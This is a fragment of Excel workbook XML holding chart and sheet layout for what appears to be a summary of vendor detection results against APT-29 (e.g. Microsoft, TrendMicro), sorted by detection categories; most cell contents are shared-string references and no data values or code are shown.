              <c16:uniqueId val="{00000003-6DE0-47E5-8CC9-9966FBBED44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="1902728128"/>
        <c:axId val="1902722304"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="190272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22304"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="19027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2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APT-29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t> Day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Summary!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>VCS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Summary!$E$7:$E$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-C414-40C3-AEA7-042E4ADDD518}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>CrowStrike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Summary!$F$7:$F$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-C414-40C3-AEA7-042E4ADDD518}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Microsoft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Summary!$G$7:$G$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-C414-40C3-AEA7-042E4ADDD518}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$H$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>TrendMicro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Summary!$D$7:$D$12</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>None</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Telemetry</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>General</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Tatic</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Technique</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>MSSP</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Summary!$H$7:$H$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000003-C414-40C3-AEA7-042E4ADDD518}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="1905443120"/>
        <c:axId val="1905438128"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="19054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38128"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="19054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942975</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>28574</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1028700</xdr:colOff>
      <xdr:row>37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971550</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>123825</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1057275</xdr:colOff>
      <xdr:row>61</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Normal="100" workbookViewId="0">
      <selection activeCell="K45" sqref="K45"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="21.85546875" customWidth="1"/>
    <col min="2" max="2" width="69" customWidth="1"/>
    <col min="3" max="3" width="18" customWidth="1"/>
    <col min="4" max="4" width="15.7109375" customWidth="1"/>
    <col min="5" max="5" width="9.7109375" customWidth="1"/>
    <col min="6" max="6" width="16.140625" customWidth="1"/>
    <col min="7" max="7" width="16.85546875" customWidth="1"/>
    <col min="8" max="8" width="19.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1" s="24" t="s">
        <v>692</v>
      </c>
      <c r="B1" s="24" t="s">
        <v>695</v>
      </c>
      <c r="C1" s="24" t="s">
        <v>698</v>
      </c>
      <c r="D1" s="24" t="s">
        <v>702</v>
      </c>
      <c r="E1" s="24" t="s">
        <v>700</v>
      </c>
      <c r="F1" s="24" t="s">
        <v>661</v>
      </c>
      <c r="G1" s="24" t="s">
        <v>662</v>
      </c>
      <c r="H1" s="24" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="2" spans="1:8" ht="34.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A2" s="41" t="s">
        <v>693</v>
      </c>
      <c r="B2" s="35" t="s">
        <v>730</v>
      </c>
      <c r="C2" s="38" t="s">
        <v>696</v>
      </c>
      <c r="D2" s="16" t="s">
        <v>337</v>
      </c>
      <c r="E2" s="16"/>
      <c r="F2" s="16"/>
      <c r="G2" s="16"/>
      <c r="H2" s="16"/>
    </row>
    <row r="3" spans="1:8" ht="34.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A3" s="42"/>
      <c r="B3" s="36"/>
      <c r="C3" s="39"/>
      <c r="D3" s="16" t="s">
        <v>340</v>
      </c>
      <c r="E3" s="16"/>
      <c r="F3" s="16"/>
      <c r="G3" s="16"/>
      <c r="H3" s="16"/>
    </row>
    <row r="4" spans="1:8" ht="34.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A4" s="42"/>
      <c r="B4" s="36"/>
      <c r="C4" s="39"/>
      <c r="D4" s="16" t="s">
        <v>646</v>
      </c>
      <c r="E4" s="16"/>
      <c r="F4" s="16"/>
      <c r="G4" s="16"/>
      <c r="H4" s="16"/>
    </row>
    <row r="5" spans="1:8" ht="34.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A5" s="42"/>
      <c r="B5" s="36"/>
      <c r="C5" s="39"/>
      <c r="D5" s="16" t="s">
        <v>3</v>
      </c>
      <c r="E5" s="16"/>
      <c r="F5" s="16"/>
      <c r="G5" s="16"/>
      <c r="H5" s="16"/>
    </row>
    <row r="6" spans="1:8" ht="31.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A6" s="43"/>
      <c r="B6" s="37"/>
      <c r="C6" s="40"/>
      <c r="D6" s="16" t="s">
        <v>674</v>
      </c>
      <c r="E6" s="16"/>
      <c r="F6" s="16"/>
      <c r="G6" s="16"/>
      <c r="H6" s="16"/>
    </row>
    <row r="7" spans="1:8" ht="42.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A7" s="32" t="s">
        <v>694</v>
      </c>
      <c r="B7" s="33" t="s">
        <v>697</v>
      </c>
      <c r="C7" s="34"/>
      <c r="D7" s="16" t="s">
        <v>337</v>
      </c>
      <c r="E7" s="16"/>
      <c r="F7" s="16"/>
      <c r="G7" s="16"/>
      <c r="H7" s="16"/>
    </row>
    <row r="8" spans="1:8" ht="30.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A8" s="32"/>
      <c r="B8" s="33"/>
      <c r="C8" s="34"/>
      <c r="D8" s="16" t="s">
        <v>340</v>
      </c>
      <c r="E8" s="16"/>
      <c r="F8" s="16"/>
      <c r="G8" s="16"/>
      <c r="H8" s="16"/>
    </row>
    <row r="9" spans="1:8" ht="33.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A9" s="32"/>
      <c r="B9" s="33"/>
      <c r="C9" s="34"/>
      <c r="D9" s="16" t="s">
        <v>646</v>
      </c>
      <c r="E9" s="16"/>
      <c r="F9" s="16"/>
      <c r="G9" s="16"/>
      <c r="H9" s="16"/>
    </row>
    <row r="10" spans="1:8" ht="32.25" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A10" s="32"/>
      <c r="B10" s="33"/>
      <c r="C10" s="34"/>
      <c r="D10" s="16" t="s">
        <v>2</v>
      </c>
      <c r="E10" s="16"/>
      <c r="F10" s="16"/>
      <c r="G10" s="16"/>
      <c r="H10" s="16"/>
    </row>
    <row r="11" spans="1:8" ht="30.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A11" s="32"/>
      <c r="B11" s="33"/>
      <c r="C11" s="34"/>
      <c r="D11" s="16" t="s">
        <v>3</v>
      </c>
      <c r="E11" s="16"/>
      <c r="F11" s="16"/>
      <c r="G11" s="16"/>
      <c r="H11" s="16"/>
    </row>
    <row r="12" spans="1:8" ht="33.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A12" s="32"/>
      <c r="B12" s="33"/>
      <c r="C12" s="34"/>
      <c r="D12" s="16" t="s">
        <v>674</v>
      </c>
      <c r="E12" s="16"/>
      <c r="F12" s="16"/>
      <c r="G12" s="16"/>
      <c r="H12" s="16"/>
    </row>
    <row r="14" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A14" s="31" t="s">
        <v>731</v>
      </c>
      <c r="B14" s="31"/>
      <c r="C14" s="31"/>
      <c r="D14" s="31"/>
      <c r="E14" s="31"/>
      <c r="F14" s="31"/>
      <c r="G14" s="31"/>
      <c r="H14" s="31"/>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A15" s="31"/>
      <c r="B15" s="31"/>
      <c r="C15" s="31"/>
      <c r="D15" s="31"/>
      <c r="E15" s="31"/>
      <c r="F15" s="31"/>
      <c r="G15" s="31"/>
      <c r="H15" s="31"/>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A16" s="31"/>
      <c r="B16" s="31"/>
      <c r="C16" s="31"/>
      <c r="D16" s="31"/>
      <c r="E16" s="31"/>
      <c r="F16" s="31"/>
      <c r="G16" s="31"/>
      <c r="H16" s="31"/>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A17" s="31"/>
      <c r="B17" s="31"/>
      <c r="C17" s="31"/>
      <c r="D17" s="31"/>
      <c r="E17" s="31"/>
      <c r="F17" s="31"/>
      <c r="G17" s="31"/>
      <c r="H17" s="31"/>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A18" s="31"/>
      <c r="B18" s="31"/>
      <c r="C18" s="31"/>
      <c r="D18" s="31"/>
      <c r="E18" s="31"/>
      <c r="F18" s="31"/>
      <c r="G18" s="31"/>
      <c r="H18" s="31"/>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="31"/>
      <c r="B19" s="31"/>
      <c r="C19" s="31"/>
      <c r="D19" s="31"/>
      <c r="E19" s="31"/>
      <c r="F19" s="31"/>
      <c r="G19" s="31"/>
      <c r="H19" s="31"/>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="31"/>
      <c r="B20" s="31"/>
      <c r="C20" s="31"/>
      <c r="D20" s="31"/>
      <c r="E20" s="31"/>
      <c r="F20" s="31"/>
      <c r="G20" s="31"/>
      <c r="H20" s="31"/>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="31"/>
      <c r="B21" s="31"/>
      <c r="C21" s="31"/>
      <c r="D21" s="31"/>
      <c r="E21" s="31"/>
      <c r="F21" s="31"/>
      <c r="G21" s="31"/>
      <c r="H21" s="31"/>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A22" s="31"/>
      <c r="B22" s="31"/>
      <c r="C22" s="31"/>
      <c r="D22" s="31"/>
      <c r="E22" s="31"/>
      <c r="F22" s="31"/>
      <c r="G22" s="31"/>
      <c r="H22" s="31"/>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="31"/>
      <c r="B23" s="31"/>
      <c r="C23" s="31"/>
      <c r="D23" s="31"/>
      <c r="E23" s="31"/>
      <c r="F23" s="31"/>
      <c r="G23" s="31"/>
      <c r="H23" s="31"/>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="31"/>
      <c r="B24" s="31"/>
      <c r="C24" s="31"/>
      <c r="D24" s="31"/>
      <c r="E24" s="31"/>
      <c r="F24" s="31"/>
      <c r="G24" s="31"/>
      <c r="H24" s="31"/>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="31"/>
      <c r="B25" s="31"/>
      <c r="C25" s="31"/>
      <c r="D25" s="31"/>
      <c r="E25" s="31"/>
      <c r="F25" s="31"/>
      <c r="G25" s="31"/>
      <c r="H25" s="31"/>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="31"/>
      <c r="B26" s="31"/>
      <c r="C26" s="31"/>
      <c r="D26" s="31"/>
      <c r="E26" s="31"/>
      <c r="F26" s="31"/>
      <c r="G26" s="31"/>
      <c r="H26" s="31"/>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A27" s="31"/>
      <c r="B27" s="31"/>
      <c r="C27" s="31"/>
      <c r="D27" s="31"/>
      <c r="E27" s="31"/>
      <c r="F27" s="31"/>
      <c r="G27" s="31"/>
      <c r="H27" s="31"/>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="31"/>
      <c r="B28" s="31"/>
      <c r="C28" s="31"/>
      <c r="D28" s="31"/>
      <c r="E28" s="31"/>
      <c r="F28" s="31"/>
      <c r="G28" s="31"/>
      <c r="H28" s="31"/>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="31"/>
      <c r="B29" s="31"/>
      <c r="C29" s="31"/>
      <c r="D29" s="31"/>
      <c r="E29" s="31"/>
      <c r="F29" s="31"/>
      <c r="G29" s="31"/>
      <c r="H29" s="31"/>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="31"/>
      <c r="B30" s="31"/>
      <c r="C30" s="31"/>
      <c r="D30" s="31"/>
      <c r="E30" s="31"/>
      <c r="F30" s="31"/>
      <c r="G30" s="31"/>
      <c r="H30" s="31"/>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="31"/>
      <c r="B31" s="31"/>
      <c r="C31" s="31"/>
      <c r="D31" s="31"/>
      <c r="E31" s="31"/>
      <c r="F31" s="31"/>
      <c r="G31" s="31"/>
      <c r="H31" s="31"/>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="31"/>
      <c r="B32" s="31"/>
      <c r="C32" s="31"/>
      <c r="D32" s="31"/>
      <c r="E32" s="31"/>
      <c r="F32" s="31"/>
      <c r="G32" s="31"/>
      <c r="H32" s="31"/>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="31"/>
      <c r="B33" s="31"/>
      <c r="C33" s="31"/>
      <c r="D33" s="31"/>
      <c r="E33" s="31"/>
      <c r="F33" s="31"/>
      <c r="G33" s="31"/>
      <c r="H33" s="31"/>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="31"/>
      <c r="B34" s="31"/>
      <c r="C34" s="31"/>
      <c r="D34" s="31"/>
      <c r="E34" s="31"/>
      <c r="F34" s="31"/>
      <c r="G34" s="31"/>
      <c r="H34" s="31"/>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="31"/>
      <c r="B35" s="31"/>
      <c r="C35" s="31"/>
      <c r="D35" s="31"/>
      <c r="E35" s="31"/>
      <c r="F35" s="31"/>
      <c r="G35" s="31"/>
      <c r="H35" s="31"/>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="31"/>
      <c r="B36" s="31"/>
      <c r="C36" s="31"/>
      <c r="D36" s="31"/>
      <c r="E36" s="31"/>
      <c r="F36" s="31"/>
      <c r="G36" s="31"/>
      <c r="H36" s="31"/>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A37" s="31"/>
      <c r="B37" s="31"/>
      <c r="C37" s="31"/>
      <c r="D37" s="31"/>
      <c r="E37" s="31"/>
      <c r="F37" s="31"/>
      <c r="G37" s="31"/>
      <c r="H37" s="31"/>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A38" s="31"/>
      <c r="B38" s="31"/>
      <c r="C38" s="31"/>
      <c r="D38" s="31"/>
      <c r="E38" s="31"/>
      <c r="F38" s="31"/>
      <c r="G38" s="31"/>
      <c r="H38" s="31"/>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="31"/>
      <c r="B39" s="31"/>
      <c r="C39" s="31"/>
      <c r="D39" s="31"/>
      <c r="E39" s="31"/>
      <c r="F39" s="31"/>
      <c r="G39" s="31"/>
      <c r="H39" s="31"/>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="31"/>
      <c r="B40" s="31"/>
      <c r="C40" s="31"/>
      <c r="D40" s="31"/>
      <c r="E40" s="31"/>
      <c r="F40" s="31"/>
      <c r="G40" s="31"/>
      <c r="H40" s="31"/>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="31"/>
      <c r="B41" s="31"/>
      <c r="C41" s="31"/>
      <c r="D41" s="31"/>
      <c r="E41" s="31"/>
      <c r="F41" s="31"/>
      <c r="G41" s="31"/>
      <c r="H41" s="31"/>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="31"/>
      <c r="B42" s="31"/>
      <c r="C42" s="31"/>
      <c r="D42" s="31"/>
      <c r="E42" s="31"/>
      <c r="F42" s="31"/>
      <c r="G42" s="31"/>
      <c r="H42" s="31"/>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="31"/>
      <c r="B43" s="31"/>
      <c r="C43" s="31"/>
      <c r="D43" s="31"/>
      <c r="E43" s="31"/>
      <c r="F43" s="31"/>
      <c r="G43" s="31"/>
      <c r="H43" s="31"/>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="31"/>
      <c r="B44" s="31"/>
      <c r="C44" s="31"/>
      <c r="D44" s="31"/>
      <c r="E44" s="31"/>
      <c r="F44" s="31"/>
      <c r="G44" s="31"/>
      <c r="H44" s="31"/>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="31"/>
      <c r="B45" s="31"/>
      <c r="C45" s="31"/>
      <c r="D45" s="31"/>
      <c r="E45" s="31"/>
      <c r="F45" s="31"/>
      <c r="G45" s="31"/>
      <c r="H45" s="31"/>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="31"/>
      <c r="B46" s="31"/>
      <c r="C46" s="31"/>
      <c r="D46" s="31"/>
      <c r="E46" s="31"/>
      <c r="F46" s="31"/>
      <c r="G46" s="31"/>
      <c r="H46" s="31"/>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A47" s="31"/>
      <c r="B47" s="31"/>
      <c r="C47" s="31"/>
      <c r="D47" s="31"/>
      <c r="E47" s="31"/>
      <c r="F47" s="31"/>
      <c r="G47" s="31"/>
      <c r="H47" s="31"/>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="31"/>
      <c r="B48" s="31"/>
      <c r="C48" s="31"/>
      <c r="D48" s="31"/>
      <c r="E48" s="31"/>
      <c r="F48" s="31"/>
      <c r="G48" s="31"/>
      <c r="H48" s="31"/>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="31"/>
      <c r="B49" s="31"/>
      <c r="C49" s="31"/>
      <c r="D49" s="31"/>
      <c r="E49" s="31"/>
      <c r="F49" s="31"/>
      <c r="G49" s="31"/>
      <c r="H49" s="31"/>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="31"/>
      <c r="B50" s="31"/>
      <c r="C50" s="31"/>
      <c r="D50" s="31"/>
      <c r="E50" s="31"/>
      <c r="F50" s="31"/>
      <c r="G50" s="31"/>
      <c r="H50" s="31"/>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A51" s="31"/>
      <c r="B51" s="31"/>
      <c r="C51" s="31"/>
      <c r="D51" s="31"/>
      <c r="E51" s="31"/>
      <c r="F51" s="31"/>
      <c r="G51" s="31"/>
      <c r="H51" s="31"/>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A52" s="31"/>
      <c r="B52" s="31"/>
      <c r="C52" s="31"/>
      <c r="D52" s="31"/>
      <c r="E52" s="31"/>
      <c r="F52" s="31"/>
      <c r="G52" s="31"/>
      <c r="H52" s="31"/>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="31"/>
      <c r="B53" s="31"/>
      <c r="C53" s="31"/>
      <c r="D53" s="31"/>
      <c r="E53" s="31"/>
      <c r="F53" s="31"/>
      <c r="G53" s="31"/>
      <c r="H53" s="31"/>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="31"/>
      <c r="B54" s="31"/>
      <c r="C54" s="31"/>
      <c r="D54" s="31"/>
      <c r="E54" s="31"/>
      <c r="F54" s="31"/>
      <c r="G54" s="31"/>
      <c r="H54" s="31"/>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="31"/>
      <c r="B55" s="31"/>
      <c r="C55" s="31"/>
      <c r="D55" s="31"/>
      <c r="E55" s="31"/>
      <c r="F55" s="31"/>
      <c r="G55" s="31"/>
      <c r="H55" s="31"/>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="31"/>
      <c r="B56" s="31"/>
      <c r="C56" s="31"/>
      <c r="D56" s="31"/>
      <c r="E56" s="31"/>
      <c r="F56" s="31"/>
      <c r="G56" s="31"/>
      <c r="H56" s="31"/>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A57" s="31"/>
      <c r="B57" s="31"/>
      <c r="C57" s="31"/>
      <c r="D57" s="31"/>
      <c r="E57" s="31"/>
      <c r="F57" s="31"/>
      <c r="G57" s="31"/>
      <c r="H57" s="31"/>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A58" s="31"/>
      <c r="B58" s="31"/>
      <c r="C58" s="31"/>
      <c r="D58" s="31"/>
      <c r="E58" s="31"/>
      <c r="F58" s="31"/>
      <c r="G58" s="31"/>
      <c r="H58" s="31"/>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="31"/>
      <c r="B59" s="31"/>
      <c r="C59" s="31"/>
      <c r="D59" s="31"/>
      <c r="E59" s="31"/>
      <c r="F59" s="31"/>
      <c r="G59" s="31"/>
      <c r="H59" s="31"/>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="31"/>
      <c r="B60" s="31"/>
      <c r="C60" s="31"/>
      <c r="D60" s="31"/>
      <c r="E60" s="31"/>
      <c r="F60" s="31"/>
      <c r="G60" s="31"/>
      <c r="H60" s="31"/>
    </row>
    <row r="61" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A61" s="31"/>
      <c r="B61" s="31"/>
      <c r="C61" s="31"/>
      <c r="D61" s="31"/>
      <c r="E61" s="31"/>
      <c r="F61" s="31"/>
      <c r="G61" s="31"/>
      <c r="H61" s="31"/>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A62" s="31"/>
      <c r="B62" s="31"/>
      <c r="C62" s="31"/>
      <c r="D62" s="31"/>
      <c r="E62" s="31"/>
      <c r="F62" s="31"/>
      <c r="G62" s="31"/>
      <c r="H62" s="31"/>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A63" s="31"/>
      <c r="B63" s="31"/>
      <c r="C63" s="31"/>
      <c r="D63" s="31"/>
      <c r="E63" s="31"/>
      <c r="F63" s="31"/>
      <c r="G63" s="31"/>
      <c r="H63" s="31"/>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A64" s="31"/>
      <c r="B64" s="31"/>
      <c r="C64" s="31"/>
      <c r="D64" s="31"/>
      <c r="E64" s="31"/>
      <c r="F64" s="31"/>
      <c r="G64" s="31"/>
      <c r="H64" s="31"/>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="A14:H64"/>
    <mergeCell ref="A7:A12"/>
    <mergeCell ref="B7:B12"/>
    <mergeCell ref="C7:C12"/>
    <mergeCell ref="B2:B6"/>
    <mergeCell ref="C2:C6"/>
    <mergeCell ref="A2:A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zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="B47" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
      <selection pane="bottomRight" activeCell="F48" sqref="F48"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="8" style="2" customWidth="1"/>
    <col min="2" max="2" width="18" style="2" customWidth="1"/>
    <col min="3" max="3" width="35.28515625" style="2" customWidth="1"/>
    <col min="4" max="4" width="56.140625" style="2" customWidth="1"/>
    <col min="5" max="5" width="72.28515625" style="2" customWidth="1"/>
    <col min="6" max="6" width="30.85546875" style="2" customWidth="1"/>
    <col min="7" max="7" width="36.140625" style="2" customWidth="1"/>
    <col min="8" max="8" width="18.5703125" style="2" customWidth="1"/>
    <col min="9" max="9" width="41.7109375" style="2" customWidth="1"/>
    <col min="10" max="10" width="32.28515625" style="2" customWidth="1"/>
    <col min="11" max="11" width="26.28515625" style="23" customWidth="1"/>
    <col min="12" max="12" width="17.7109375" style="23" customWidth="1"/>
    <col min="13" max="13" width="23.140625" style="2" customWidth="1"/>
    <col min="14" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A1" s="45"/>
      <c r="B1" s="45"/>
      <c r="C1" s="45"/>
      <c r="D1" s="45"/>
      <c r="E1" s="45"/>
      <c r="F1" s="45" t="s">
        <v>734</v>
      </c>
      <c r="G1" s="45"/>
      <c r="H1" s="45"/>
      <c r="I1" s="45"/>
      <c r="J1" s="45"/>
      <c r="K1" s="45" t="s">
        <v>732</v>
      </c>
      <c r="L1" s="45"/>
      <c r="M1" s="45"/>
    </row>
    <row r="2" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>0</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>93</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>80</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>336</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>338</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>115</v>
      </c>
      <c r="K2" s="22" t="s">
        <v>704</v>
      </c>
      <c r="L2" s="1" t="s">
        <v>705</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="3" spans="1:13" ht="75" x14ac:dyDescent="0.25">
      <c r="A3" s="15" t="s">
        <v>244</v>
